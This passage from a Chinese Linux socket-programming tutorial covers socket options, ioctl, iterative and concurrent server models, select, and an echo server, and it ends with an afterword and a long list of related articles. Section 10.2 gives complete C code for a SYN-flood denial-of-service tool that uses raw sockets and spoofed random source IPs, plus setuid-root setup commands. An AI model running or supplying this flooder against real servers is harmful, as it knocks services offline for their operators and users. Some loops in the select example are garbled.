这样当正常的用户向服务器发出请求时,由于没有了资源而不能成功.于是就出现了春节时所出现的情况.
8. 套接字选项
有时候我们要控制套接字的行为(如修改缓冲区的大小),这个时候我们就要控制套接字的选项了.


8.1 getsockopt和setsockopt

int getsockopt(int sockfd,int level,int optname,void *optval,socklen_t *optlen)
int setsockopt(int sockfd,int level,int optname,const void *optval,socklen_t *optlen)

level指定控制套接字的层次.可以取三种值: 1)SOL_SOCKET:通用套接字选项. 2)IPPROTO_IP:IP选项. 3)IPPROTO_TCP:TCP选项.
optname指定控制的方式(选项的名称),我们下面详细解释

optval获得或者是设置套接字选项.根据选项名称的数据类型进行转换


选项名称 说明 数据类型
========================================================================
SOL_SOCKET
------------------------------------------------------------------------
SO_BROADCAST 允许发送广播数据 int
SO_DEBUG 允许调试 int
SO_DONTROUTE 不查找路由 int
SO_ERROR 获得套接字错误 int
SO_KEEPALIVE 保持连接 int
SO_LINGER 延迟关闭连接 struct linger
SO_OOBINLINE 带外数据放入正常数据流 int
SO_RCVBUF 接收缓冲区大小 int
SO_SNDBUF 发送缓冲区大小 int
SO_RCVLOWAT 接收缓冲区下限 int
SO_SNDLOWAT 发送缓冲区下限 int
SO_RCVTIMEO 接收超时 struct timeval
SO_SNDTIMEO 发送超时 struct timeval
SO_REUSERADDR 允许重用本地地址和端口 int
SO_TYPE 获得套接字类型 int
SO_BSDCOMPAT 与BSD系统兼容 int
==========================================================================
IPPROTO_IP
--------------------------------------------------------------------------
IP_HDRINCL 在数据包中包含IP首部 int
IP_OPTINOS IP首部选项 int
IP_TOS 服务类型
IP_TTL 生存时间 int
==========================================================================
IPPRO_TCP
--------------------------------------------------------------------------
TCP_MAXSEG TCP最大数据段的大小 int
TCP_NODELAY 不使用Nagle算法 int
=========================================================================

关于这些选项的详细情况请查看 Linux Programmers Manual

8.2 ioctl
ioctl可以控制所有的文件描述符的情况,这里介绍一下控制套接字的选项.

int ioctl(int fd,int req,...)

==========================================================================
ioctl的控制选项
--------------------------------------------------------------------------
SIOCATMARK 是否到达带外标记 int
FIOASYNC 异步输入/输出标志 int
FIONREAD 缓冲区可读的字节数 int

详细的选项请用 man ioctl_list 查看.

9. 服务器模型
学 习过《软件工程》吧.软件工程可是每一个程序员"必修"的课程啊.如果你没有学习过, 建议你去看一看. 在这一章里面,我们一起来从软件工程的角度学习网络编程的思想.在我们写程序之前, 我们都应该从软件工程的角度规划好我们的软件,这样我们开发软件的效率才会高. 在网络程序里面,一般的来说都是许多客户机对应一个服务器.为了处理客户机的请求, 对服务端的程序就提出了特殊的要求.我们学习一下目前最常用的服务器模型.

循环服务器:循环服务器在同一个时刻只可以响应一个客户端的请求

并发服务器:并发服务器在同一个时刻可以响应多个客户端的请求


9.1 循环服务器:UDP服务器
UDP循环服务器的实现非常简单:UDP服务器每次从套接字上读取一个客户端的请求,处理, 然后将结果返回给客户机.

可以用下面的算法来实现.

socket(...);
bind(...);
while(1)
{
recvfrom(...);
process(...);
sendto(...);
}

因为UDP是非面向连接的,没有一个客户端可以老是占住服务端. 只要处理过程不是死循环, 服务器对于每一个客户机的请求总是能够满足.
9.2 循环服务器:TCP服务器
TCP循环服务器的实现也不难:TCP服务器接受一个客户端的连接,然后处理,完成了这个客户的所有请求后,断开连接.

算法如下:

socket(...);
bind(...);
listen(...);
while(1)
{
accept(...);
while(1)
{
read(...);
process(...);
write(...);
}
close(...);
}

TCP循环服务器一次只能处理一个客户端的请求.只有在这个客户的所有请求都满足后, 服务器才可以继续后面的请求.这样如果有一个客户端占住服务器不放时,其它的客户机都不能工作了.因此,TCP服务器一般很少用循环服务器模型的.

9.3 并发服务器:TCP服务器
为了弥补循环TCP服务器的缺陷,人们又想出了并发服务器的模型. 并发服务器的思想是每一个客户机的请求并不由服务器直接处理,而是服务器创建一个 子进程来处理.

算法如下:

socket(...);
bind(...);
listen(...);
while(1)
{
accept(...);
if(fork(..)==0)
{
while(1)
{
read(...);
process(...);
write(...);
}
close(...);
exit(...);
}
close(...);
}

TCP并发服务器可以解决TCP循环服务器客户机独占服务器的情况. 不过也同时带来了一个不小的问题.为了响应客户机的请求,服务器要创建子进程来处理. 而创建子进程是一种非常消耗资源的操作.

9.4 并发服务器:多路复用I/O
为了解决创建子进程带来的系统资源消耗,人们又想出了多路复用I/O模型.

首先介绍一个函数select

int select(int nfds,fd_set *readfds,fd_set *writefds,
fd_set *except fds,struct timeval *timeout)
void FD_SET(int fd,fd_set *fdset)
void FD_CLR(int fd,fd_set *fdset)
void FD_ZERO(fd_set *fdset)
int FD_ISSET(int fd,fd_set *fdset)

一 般的来说当我们在向文件读写时,进程有可能在读写出阻塞,直到一定的条件满足. 比如我们从一个套接字读数据时,可能缓冲区里面没有数据可读(通信的对方还没有 发送数据过来),这个时候我们的读调用就会等待(阻塞)直到有数据可读.如果我们不 希望阻塞,我们的一个选择是用select系统调用. 只要我们设置好select的各个参数,那么当文件可以读写的时候select回"通知"我们 说可以读写了. readfds所有要读的文件文件描述符的集合
writefds所有要的写文件文件描述符的集合

exceptfds其他的服要向我们通知的文件描述符

timeout超时设置.

nfds所有我们监控的文件描述符中最大的那一个加1

在我们调用select时进程会一直阻塞直到以下的一种情况发生. 1)有文件可以读.2)有文件可以写.3)超时所设置的时间到.

为了设置文件描述符我们要使用几个宏. FD_SET将fd加入到fdset

FD_CLR将fd从fdset里面清除

FD_ZERO从fdset中清除所有的文件描述符

FD_ISSET判断fd是否在fdset集合中

使用select的一个例子

int use_select(int *readfd,int n)
{
fd_set my_readfd;
int maxfd;
int i;

maxfd=readfd[0];
for(i=1;i if(readfd>maxfd) maxfd=readfd;
while(1)
{
/* 将所有的文件描述符加入 */
FD_ZERO(&my_readfd);
for(i=0;i FD_SET(readfd,*my_readfd);
/* 进程阻塞 */
select(maxfd+1,& my_readfd,NULL,NULL,NULL);
/* 有东西可以读了 */
for(i=0;i if(FD_ISSET(readfd,&my_readfd))
{
/* 原来是我可以读了 */
we_read(readfd);
}
}
}

使用select后我们的服务器程序就变成了.


初始话(socket,bind,listen);

while(1)
{
设置监听读写文件描述符(FD_*);

调用select;

如果是倾听套接字就绪,说明一个新的连接请求建立
{
建立连接(accept);
加入到监听文件描述符中去;
}
否则说明是一个已经连接过的描述符
{
进行操作(read或者write);
}

}

多路复用I/O可以解决资源限制的问题.着模型实际上是将UDP循环模型用在了TCP上面. 这也就带来了一些问题.如由于服务器依次处理客户的请求,所以可能会导致有的客户 会等待很久.

9.5 并发服务器:UDP服务器
人们把并发的概念用于UDP就得到了并发UDP服务器模型. 并发UDP服务器模型其实是简单的.和并发的TCP服务器模型一样是创建一个子进程来处理的 算法和并发的TCP模型一样.

除非服务器在处理客户端的请求所用的时间比较长以外,人们实际上很少用这种模型.


9.6 一个并发TCP服务器实例

#include
#include
#include
#include
#include
#define MY_PORT 8888

int main(int argc ,char **argv)
{
int listen_fd,accept_fd;
struct sockaddr_in client_addr;
int n;

if((listen_fd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Socket Error:%s/n/a",strerror(errno));
exit(1);
}

bzero(&client_addr,sizeof(struct sockaddr_in));
client_addr.sin_family=AF_INET;
client_addr.sin_port=htons(MY_PORT);
client_addr.sin_addr.s_addr=htonl(INADDR_ANY);
n=1;
/* 如果服务器终止后,服务器可以第二次快速启动而不用等待一段时间 */
setsockopt(listen_fd,SOL_SOCKET,SO_REUSEADDR,&n,sizeof(int));
if(bind(listen_fd,(struct sockaddr *)&client_addr,sizeof(client_addr))<0)
{
printf("Bind Error:%s/n/a",strerror(errno));
exit(1);
}
listen(listen_fd,5);
while(1)
{
accept_fd=accept(listen_fd,NULL,NULL);
if((accept_fd<0)&&(errno==EINTR))
continue;
else if(accept_fd<0)
{
printf("Accept Error:%s/n/a",strerror(errno));
continue;
}
if((n=fork())==0)
{
/* 子进程处理客户端的连接 */
char buffer[1024];

close(listen_fd);
n=read(accept_fd,buffer,1024);
write(accept_fd,buffer,n);
close(accept_fd);
exit(0);
}
else if(n<0)
printf("Fork Error:%s/n/a",strerror(errno));
close(accept_fd);
}
}

你可以用我们前面写客户端程序来调试着程序,或者是用来telnet调试

10. 原始套接字
我 们在前面已经学习过了网络程序的两种套接字(SOCK_STREAM,SOCK_DRAGM).在这一章 里面我们一起来学习另外一种套接字--原始套接字(SOCK_RAW). 应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能. 注意原始套接字只能够由有root权限的人创建.

10.1 原始套接字的创建

int sockfd(AF_INET,SOCK_RAW,protocol)

可以创建一个原始套接字.根据协议的类型不同我们可以创建不同类型的原始套接字 比如:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP等等.详细的情况查看 下面我们以一个实例来说明原始套接字的创建和使用

10.2 一个原始套接字的实例
还记得DOS是什么意思吗?在这里我们就一起来编写一个实现DOS的小程序. 下面是程序的源代码

/******************** DOS.c *****************/
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define DESTPORT 80 /* 要攻击的端口(WEB) */
#define LOCALPORT 8888

void send_tcp(int sockfd,struct sockaddr_in *addr);
unsigned short check_sum(unsigned short *addr,int len);

int main(int argc,char **argv)
{
int sockfd;
struct sockaddr_in addr;
struct hostent *host;
int on=1;

if(argc!=2)
{
fprintf(stderr,"Usage:%s hostname/n/a",argv[0]);
exit(1);
}

bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_port=htons(DESTPORT);

if(inet_aton(argv[1],&addr.sin_addr)==0)
{
host=gethostbyname(argv[1]);
if(host==NULL)
{
fprintf(stderr,"HostName Error:%s/n/a",hstrerror(h_errno));
exit(1);
}
addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
}

/**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/

sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
if(sockfd<0)
{
fprintf(stderr,"Socket Error:%s/n/a",strerror(errno));
exit(1);
}
/******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/

setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));

/**** 没有办法,只用超级护用户才可以使用原始套接字 *********/
setuid(getpid());

/********* 发送炸弹了!!!! ****/
send_tcp(sockfd,&addr);
}

/******* 发送炸弹的实现 *********/
void send_tcp(int sockfd,struct sockaddr_in *addr)
{
char buffer[100]; /**** 用来放置我们的数据包 ****/
struct ip *ip;
struct tcphdr *tcp;
int head_len;

/******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/

head_len=sizeof(struct ip)+sizeof(struct tcphdr);

bzero(buffer,100);

/******** 填充IP数据包的头部,还记得IP的头格式吗? ******/
ip=(struct ip *)buffer;
ip->ip_v=IPVERSION; /** 版本一般的是 4 **/
ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/
ip->ip_tos=0; /** 服务类型 **/
ip->ip_len=htons(head_len); /** IP数据包的长度 **/
ip->ip_id=0; /** 让系统去填写吧 **/
ip->ip_off=0; /** 和上面一样,省点时间 **/
ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/
ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/
ip->ip_sum=0; /** 校验和让系统去做 **/
ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/

/******* 开始填写TCP数据包 *****/
tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
tcp->source=htons(LOCALPORT);
tcp->dest=addr->sin_port; /** 目的端口 **/
tcp->seq=random();
tcp->ack_seq=0;
tcp->doff=5;
tcp->syn=1; /** 我要建立连接 **/
tcp->check=0;


/** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/
while(1)
{
/** 你不知道我是从那里来的,慢慢的去等吧! **/
ip->ip_src.s_addr=random();

/** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */
/** 下面这条可有可无 */
tcp->check=check_sum((unsigned short *)tcp,
sizeof(struct tcphdr));
sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
}
}

/* 下面是首部校验和的算法,偷了别人的 */
unsigned short check_sum(unsigned short *addr,int len)
{
register int nleft=len;
register int sum=0;
register short *w=addr;
short answer=0;

while(nleft>1)
{
sum+=*w++;
nleft-=2;
}
if(nleft==1)
{
*(unsigned char *)(&answer)=*(unsigned char *)w;
sum+=answer;
}

sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer=~sum;
return(answer);
}

编译一下,拿localhost做一下实验,看看有什么结果.(千万不要试别人的啊). 为了让普通用户可以运行这个程序,我们应该将这个程序的所有者变为root,且 设置setuid位

[root@hoyt /root]#chown root DOS
[root@hoyt /root]#chmod +s DOS


10.3 总结
原 始套接字和一般的套接字不同的是以前许多由系统做的事情,现在要由我们自己来做了. 不过这里面是不是有很多的乐趣呢. 当我们创建了一个TCP套接字的时候,我们只是负责把我们要发送的内容(buffer)传递给了系统. 系统在收到我们的数据后,回自动的调用相应的模块给数据加上TCP头部,然后加上IP头部. 再发送出去.而现在是我们自己创建各个的头部,系统只是把它们发送出去. 在上面的实例中,由于我们要修改我们的源IP地址,所以我们使用了setsockopt函数,如果我们只是修改TCP数据,那么IP数据一样也可以由系统 来创建的.


11. 后记
总算完成了网络编程这个教程.算起来我差不多写了一个星期,原来以为写这个应该是一件 不难的事,做起来才知道原来有很多的地方都比我想象的要难.我还把很多的东西都省略掉了 不过写完了这篇教程以后,我好象对网络的认识又增加了一步.

如 果我们只是编写一般的 网络程序还是比较容易的,但是如果我们想写出比较好的网络程序我们还有着遥远的路要走. 网络程序一般的来说都是多进程加上多线程的.为了处理好他们内部的关系,我们还要学习 进程之间的通信.在网络程序里面有着许许多多的突发事件,为此我们还要去学习更高级的 事件处理知识.现在的信息越来越多了,为了处理好这些信息,我们还要去学习数据库. 如果要编写出有用的黑客软件,我们还要去熟悉各种网络协议.总之我们要学的东西还很多很多.

看一看外国的软件水平,看一看印度的软件水平,宝岛台湾的水平,再看一看我们自己的 软件水平大家就会知道了什么叫做差距.我们现在用的软件有几个是我们中国人自己编写的.

不过大家不要害怕,不用担心.只要我们还是清醒的,还能够认清我们和别人的差距, 我们就还有希望. 毕竟我们现在还年轻.只要我们努力,认真的去学习,我们一定能够学好的.我们就可以追上别人直到超过别人!

相信一点:

别人可以做到的我们一样可以做到,而且可以比别人做的更好!

勇敢的年轻人,为了我们伟大祖国的软件产业,为了祖国的未来,努力的去奋斗吧!祖国会记住你们的!


hoyt

11.1 参考资料
<<实用UNIX编程>>---机械工业出版社.

<>--清华大学出版社.

--------------------------------------------------------------------------------
相关文章
Cisco(思科)路由器上如何防止DDoS 2008-6-7 11:24:30
cisco ASA防火墙配置笔记 2008-6-7 11:22:48
初次远程做Linux Iptables规则注意事项 2008-6-1 18:01:24
在Linux操作系统中,通过bonding 绑定实现网络负载均衡 2008-6-1 17:48:14
关于Apache (httpd)服务器防DDOS模块mod_evasive的使用说明 2008-6-1 17:45:27
使用php-syslog-ng远程查看与管理系统日志 2008-5-15 12:58:08
Linux监视用户的使用情况 2008-5-11 18:23:14
理解 DNS 2008-5-11 17:54:47
linux 常用命令总结 2008-4-28 18:51:58
linux 系统管理篇--环境变量 2008-4-28 18:50:45
vsftpd架设匿名FTP,本地用户和虚拟用户mysql登录 2008-4-27 8:23:51
wu-ftpd服务器配置手册 2008-4-27 8:16:31
vsftpd on RHL 9.0 虚拟用户设置ftp 2008-4-27 8:15:01
vsftp配置大全---完整版 2008-4-27 8:13:22
Linux下一般最常用的工具wu-ftpd. 2008-4-27 8:04:14
通过设置Cisco路由器D.D.O.S攻击手段的细节 2008-1-10 17:49:44
Cisco路由器上防止分布式拒绝服务(DDoS) 2008-1-10 9:07:50
一个强大的文件下载工具curl 2007-12-24 14:35:15
方便的网络下载工具wget 2007-12-24 14:34:15
计算机时钟设定和校准 2007-12-8 16:04:32
查看linux版本信息命令 2007-8-7 16:58:16
31 个用来测试你网站各项性能的免费在线工具 2007-6-20 10:43:17
NTP网络时钟协议的实现 2007-6-6 15:43:49
Linux 2.6.19.x 内核编译配置选项简介 2007-5-29 7:55:59
linux内核编译步骤 2007-5-29 7:19:24
Linux下常用应用软件列表 2007-5-29 7:12:53
Linux 下实现网卡高可用性的几种方法 2007-5-28 17:42:06
基于Windows 2003 和 Bind 9 的智能域名(DNS)服务 2007-5-23 8:10:39
智能DNS网通电信互通解决方案 2007-5-17 17:50:09
用rsync实现网站镜像和备份 2007-5-17 17:43:10
DNS dig 2007-5-17 17:33:52
用 dig排除DNS故障 2007-5-17 17:11:29
Linux软件安装之RPM的安装技巧 2007-5-17 10:49:56
怎样备份红帽企业版操作系统? 2007-5-15 7:59:22
怎样在运行的系统中设置RAID 1(镜像)? 2007-5-15 7:56:36
Cisco路由器如何防止DDoS攻击 2007-5-10 14:47:23
分类防范对Linux的DoS攻击 2007-5-10 14:46:31
Linux各版本上的多网卡绑定(Debian和Ubuntu,SuSE,Fedora和RH) 2007-3-22 11:03:07
iptables防火墙配置工具ShoreWall的安装和使用实例 2007-3-22 10:32:05
linux common command 2007-2-1 20:13:16
基于FreeBSD5.4全能服务器安装 2007-2-1 17:19:40
常见 iptables 的 firewall 设定配置问题: 2007-1-16 15:07:48
LINUX下配置DNS全文 2007-1-16 15:06:17
DNS网通电信互通解决方案 2007-1-16 15:05:02
DNS 配置详解 2007-1-16 15:01:02
用Linux系统防火墙功能抵御网络攻击 2006-12-14 17:28:02
UNIX应急响应攻略 2006-12-14 13:41:20
Linux安全配置步骤简述 2006-12-14 13:36:24
应对Linux服务器四种级别攻击 2006-12-4 16:44:54
freeradius+mysql为华为防火墙做vpn用户验证 2006-9-4 8:50:45
7200路由模拟器使用手册 2006-8-20 19:58:24
网络故障处理手册 2006-7-25 14:09:43
Solaris系统安全之审计 2006-7-22 17:26:03
Linux网络配置工具netconf 2006-7-13 8:17:41
如何使用Cisco IOS文件系统命令 2006-7-13 8:14:53
路由器默认密码 2006-6-28 23:05:49
DNS服务器日志维护 2006-6-26 17:23:00
服务器的日志合并统计 2006-6-17 11:31:34
root密码丢了,怎么办? 2006-6-17 11:07:25
架构根据电信、网通用户自动解析不同IP的DNS服务器 2006-6-17 11:05:57
基于mysql的bind(bind-9.3.1或更高版本) 2006-6-17 10:07:17
DHCP + DNS (bind) == DDNS 2006-6-17 10:04:25
DNS网通电信互通解决方案 2006-6-17 10:00:42
解决双出口校园网瓶颈 2006-6-17 9:47:20
Linux下软件RAID的实现 2006-6-14 19:20:39
ping的高级用法 2006-6-12 12:35:59
用PHP编写PDF文档生成器 2006-6-11 8:50:26
Linux磁盘存储区管理原理与技巧 2006-6-10 9:57:51
chroot bind on RedHat9 安裝實錄 2006-5-29 11:10:16
Solaris中的酷命令 2006-5-25 19:47:03
网络安全讲座之八:审计结果 2006-5-24 19:46:24
网络安全讲座之七:IDS系统 2006-5-24 19:45:52
网络安全讲座之六:侦察与工具 2006-5-24 19:43:53
网络安全讲座之五:文件系统安全 2006-5-24 19:43:20
网络安全讲座之四:账号安全 2006-5-24 19:42:35
网络专业人士笔记 2006-5-22 10:06:48
VSFTPD的高手篇 2006-5-19 16:13:43
Linux 进程管理 2006-5-12 16:21:51
探查DNS服务器运行状况 2006-5-12 15:55:08
企业网站服务器负载均衡技术 2006-5-8 19:33:36
实现四台Web服务器的负载均衡 2006-5-8 19:32:09
find命令详解 2006-5-8 15:35:41
文件内容查询命令 2006-5-8 15:34:04
CDN 内容分发网络技术 2006-5-8 15:30:39
使用OPENVPN实现各机房的互通 2006-5-8 14:34:04
OpenVPN使用User/Pass验证登录 2006-5-8 14:33:08
vsftp配置大全 2006-5-6 18:17:32
建立一个带宽、线程可控的下载型WEB网站 2006-4-30 13:53:11
Linux 作为 DHCP 服务器 2006-4-30 13:47:54
使linux系统对ping不反应 2006-4-30 13:38:17
分级防御对Linux服务器的攻击 2006-4-30 13:28:03
SNARE-系统入侵分析和报告环境 2006-4-30 13:16:31
Linux下配置完整安全的DHCP服务器详解 2006-4-30 12:46:51
让Linux成为DNS服务器 2006-4-30 12:32:45
在Cisco设备上实现IOS DHCP Server的功能 2006-4-30 12:31:15
向P2P通信宣战(关于封BT下载软件) 2006-4-4 8:07:19
用专用Linux日志服务器增强系统安全 2006-4-3 13:37:51
正确认识宽带路由器的主要参数 2006-3-20 13:10:39
网络常见攻击方式及对应防御方式概述 2005-12-25 14:56:55
基于网络IDS的典型配置 2005-12-14 8:46:10
Linux必学的系统安全命令 2005-12-13 18:02:56
交换机故障的一般分类和排障步骤 2005-12-13 14:44:33
Cisco IOS进程调试 2005-11-26 20:15:38
linux忘记了密码怎么办 2005-11-25 10:13:49
Linux中文件查找技术大全 2005-11-25 10:05:27
LVM使用手册 2005-11-25 9:55:01
一份非常内行的Linux LVM HOWTO 2005-11-25 9:54:20
思科IOS 12.3新特性 2005-11-21 9:32:14
Linux 安全设置手册 2005-11-12 16:07:52
《网络基础学习之二十》路由器的配置 2005-11-11 10:03:00
《网络基础学习之十四》交换机配置全接触 2005-11-11 9:56:00
《网络基础学习之十》组建小型C/S网络 2005-11-11 9:50:23
《网络基础学习之二》常见局域网拓扑及操作系统 2005-11-11 9:38:06
Sniff网络基础原理和软件实现技巧详解 2005-11-5 21:15:12
FIND的妙用 2005-10-28 14:16:18
VI的使用 2005-10-28 14:15:42
系统入侵者攻击企业或敏感数据网络方法白皮书 2005-10-11 10:52:53
在RedHat9上构建小型的入侵检测系统 2005-9-20 14:14:17
解析入侵检测系统的性能的辨别方法 2005-9-14 10:51:07
多服务器的日志合并统计 2005-8-29 15:16:44
Linux 2.4 Packet Filtering HOWTO 简体中文版 2005-8-19 8:27:48
利用网络漏洞扫描系统保障系统与网络的安全 2005-8-16 17:46:26
Web服务器日志统计分析完全解决方案 2005-8-10 12:27:24
网络使用的学习总结 2005-8-10 8:27:09
一块网卡绑定多IP与多网卡使用一个IP 2005-8-8 9:38:37
Linux常见的紧急情况的处理方法 2005-8-4 13:13:00
AWStats: 跨平台的日志分析工具——在GNU/Linux和Windows平台上的使用简介 2005-7-28 16:44:17
2005年网络工程师考试题目预测(1) 2005-7-6 20:54:53
2005年网络工程师考试题目预测(2) 2005-7-6 20:53:26
CCNP-CIT中文笔记 完整版 2005-6-24 15:31:49
网络流量监控器mrtg全攻略 2005-6-17 15:03:36
多个网卡绑定一个IP地址(bonding) 2005-6-10 21:18:12
再探安装多操作系统分区,grub的设置问题 2005-6-10 21:14:14
用安装光盘来修复grub 2005-6-10 21:12:03
dos下用grub.exe修复启动故障 2005-6-10 21:10:44
软件vpn与硬件的优势对比 2005-6-3 12:14:03
vsftpd架设匿名FTP,本地用户和虚拟用户mysql登录 2005-6-3 12:12:34
把linux配置成pix 的日志主机 2005-6-3 12:07:51
netfilter/iptables模块编译及应用 2005-6-3 12:04:20
在Linux操作系统下备份恢复技术的应用 2005-6-3 11:53:31
GRUB安装,配置及使用汇总 2005-4-20 12:19:49
基于网络IDS的典型配置 2005-3-24 9:01:23
Solaris启动过程详解 2005-3-23 13:22:12
在AS3.0上安装oracle 10g 2004-11-29 8:43:02
恢复Windows2000/XP 管理员密码 2004-11-24 8:38:12
Linux下加挂文件系统 2004-11-15 14:34:32
学会使用Linux性能分析工具 2004-11-15 14:32:48
Linux常见故障的紧急处理方法 2004-11-10 16:26:57
100多道简单网络基础题(答案) 2004-11-9 10:09:43
BIOS设置攻略,比较全面! 2004-10-21 8:47:33
一个网卡绑定多个IP地址 2004-10-19 8:41:47
多个网卡绑定一个IP地址(bonding) 2004-10-19 8:41:07
系统安全名词列表(2) 2004-10-8 9:40:16
系统安全名词列表(1) 2004-10-8 9:38:02
插翅难逃 根据Web服务器的记录来追踪黑客 2004-9-17 8:56:49
[Linux命令]文件内容查询命令 2004-9-9 9:55:07
[Linux命令]文件的复制、删除和移动命令 2004-9-9 9:53:44
[Linux命令]目录的创建与删除命令 2004-9-9 9:52:44
[Linux命令]改变文件或目录的访问权限命令 2004-9-9 9:51:44
[Linux命令]备份与压缩命令 2004-9-9 9:49:50
[Linux命令]在Linux环境下运行DOS命令 2004-9-9 9:49:01
[Linux命令]进程管理及作业控制 2004-9-9 9:48:08
[Linux命令]进程查看 2004-9-9 9:47:05
[Linux命令]进程调度 2004-9-9 9:45:59
[Linux命令]磁盘操作与管理 2004-9-9 9:44:58
[Linux命令]与系统管理有关的命令 2004-9-9 9:44:03
[Linux命令]Linux下的打印工作命令 2004-9-9 9:43:09
[Linux命令]shell命令 2004-9-9 9:40:44
[Linux命令]屏幕文本编辑器Vi 2004-9-9 9:39:16
[Linux命令]进入与退出系统 2004-9-9 9:37:44
怎样在Cisco设备上实现IOS DHCP Server的功能 2004-9-1 11:19:27
实现四台Web服务器的负载均衡 2004-9-1 11:15:32
Linux下硬盘分区的最佳方案 2004-9-1 10:24:46
网络流量监控器mrtg全攻略 2004-8-21 10:14:35
使用Mrtg监控网络流量(Linux版本) 2004-8-21 10:06:06
硬盘数据恢复实例全解 2004-8-21 9:55:55
实现四台服务器的负载均衡 2004-8-13 13:01:59
计算机端口介绍[详细列表] 2004-8-9 8:02:50
关于Sniffer 2004-7-26 8:47:20
恢复Windows2000/XP 管理员密码 2004-7-22 14:21:55
CIT中文笔记 2004-7-15 11:52:42
一种 Web 应用程序级别的 Cluster 实现技术 2004-7-14 16:23:12
linux环境下发现并阻止系统攻击 2004-7-1 13:37:59
在Linux下调整网卡的工作模式 2004-7-1 13:09:52
Linux 网络的多播 IP 技术 2004-6-18 8:05:59
使用 Shell 2004-6-18 8:02:11
华为的产品分类 2004-6-7 7:57:52
Linux常用命令索引 2004-5-31 8:02:27
Linux常见故障的紧急处理方法 2004-5-26 14:08:31
VNC的安装与使用 2004-5-26 14:06:49
linux 下的差异和增量备份 2004-5-26 13:50:31
Linux一句话精彩问答-网络相关篇 2004-5-26 13:44:58
Linux一句话精彩问答-网络无关篇 2004-5-26 13:43:14
网站基本规划书 2004-5-26 12:16:06
將 iptables 的規則寫成 shell 執行檔 2004-4-1 8:46:56
Ghost V8.0 使用详解 2004-3-30 14:52:47
mac地址更改全攻略 2004-3-16 16:59:30
深入学习Linux下的网络监听技术 2004-2-20 13:53:41
WEB安全工具 2004-2-20 13:51:23
Linux口令恢复任我行 2004-2-20 13:48:54
Linux实现简单而有效的IDS系统 2004-2-20 13:45:34
netfilter和squid配合创建透明代理的问题讨论 2004-2-18 9:22:08
网络端口及其详解分页 2004-2-17 9:03:12
Snort 中文手册 2004-1-29 11:53:10
U盘上的LINUX 2004-1-29 11:49:46
Linux支持ASP 安装配置手册 2004-1-24 19:16:30
TCPDUMP中文手册 2004-1-8 9:25:54
Linux软件安装一般方法 2003-12-31 20:57:02
LINUX新手入门及安装配置faq200(下) 2003-12-31 20:54:57
LINUX新手入门及安装配置faq200(上) 2003-12-31 20:51:43
Rhl9.0中qq必杀 2003-12-31 20:47:00
Linux实现ip和mac绑定 2003-12-31 20:40:01
在RedHat9下配置时间服务器 2003-12-31 20:35:06
高性能linux双效防火墙howto 2003-12-31 20:32:05
Linux 运行级init详解 2003-12-31 20:23:27
好用的Linux小工具:Autofs 2003-12-31 20:21:19
Linux教程-进程查看 2003-12-31 20:12:18
Ifconfig网络配置工具详解 2003-12-31 20:11:15
使用x-window的远程显示 2003-12-31 20:09:46
Linux常见紧急情况处理方法 2003-12-31 20:06:21
用webalizer分析web日志 2003-12-31 20:03:04
在unix linux下安装配置DHCP服务 2003-12-31 20:00:40
用 Linux 打造路由器 2003-11-25 9:55:06
Grub配置杂谈(转载) 2003-11-23 10:03:05
限制单个IP并发TCP连接的iptables方法 2003-11-20 14:06:11
使用图形客户端远程访问Linux服务器 2003-11-19 10:42:48
Symantec.Ghost.8.0企业版使用全攻略 2003-11-4 8:57:43
装机软件合集 2003-10-31 9:28:44
通过设置Cisco路由器防止分布式D.O.S攻击手段的细节 2003-10-30 16:56:20
在防火墙环境下DNS的安装与设置 2003-10-30 11:24:12
linux经典问题==程序开发篇 2003-10-30 11:20:52
linux经典问题==网络篇 2003-10-30 11:20:02
linux经典问题==基础篇 2003-10-30 11:19:02
LINUX 常见问题1000个详细解答 2003-10-29 14:13:25
RedHat 9.0上ADSL最终解决方案 2003-10-23 15:12:36
ADSL+RH8.0透明网关指南 2003-10-23 15:11:40
Redhat9+ADSL+IPTABLES+DHCPD解决方案 2003-9-17 8:44:16
【FAQ】RPM软件包使用常见问题 2003-9-17 8:35:09
网络层访问权限控制技术 ACL详解 2003-9-9 8:49:02
最佳的75个安全工具 2003-9-5 15:18:38
基于Linux的集群系统(八) 2003-9-1 18:53:47
基于Linux的集群系统(七) 2003-9-1 18:45:05
基于Linux的集群系统(六) 2003-9-1 18:41:44
基于Linux的集群系统 2003-9-1 18:32:33
基于Linux的集群系统(二) 2003-9-1 18:27:32
基于linux的集群系统(一) 2003-9-1 18:25:40
20%的SOLARIS知识解决80%的问题 2003-8-29 15:16:51
理解Linux系统的日志 2003-8-27 13:41:13
Linux远程启动 2003-8-27 13:22:01
调谐LINUX网络性能之网络配置文件详解 2003-8-27 13:16:13
制作自己的Floppy-Linux Step By Step 2003-8-27 13:12:27
Lynx 简明使用指南 2003-8-19 9:42:57
Linux服务器的一些基本应用 2003-8-15 12:11:07
RedHat7.3 上建立网通拨号的上网共享 2003-8-15 11:03:32
Linux下如何接ADSL一类的宽带猫带动局域网上internet (转) 2003-8-15 10:45:23
Linux系统命令分类详解 (2) 2003-8-12 9:23:12
Linux系统命令分类详解(1) 2003-8-12 9:22:30
在RedHat下建立群集 2003-8-12 9:13:09
Debian GNU/Linux下的入侵检测系统 2003-8-12 8:41:10
快速建立一个入侵检测系统 2003-8-12 8:39:47
在LINUX中实现流量控制器 2003-8-12 8:37:08
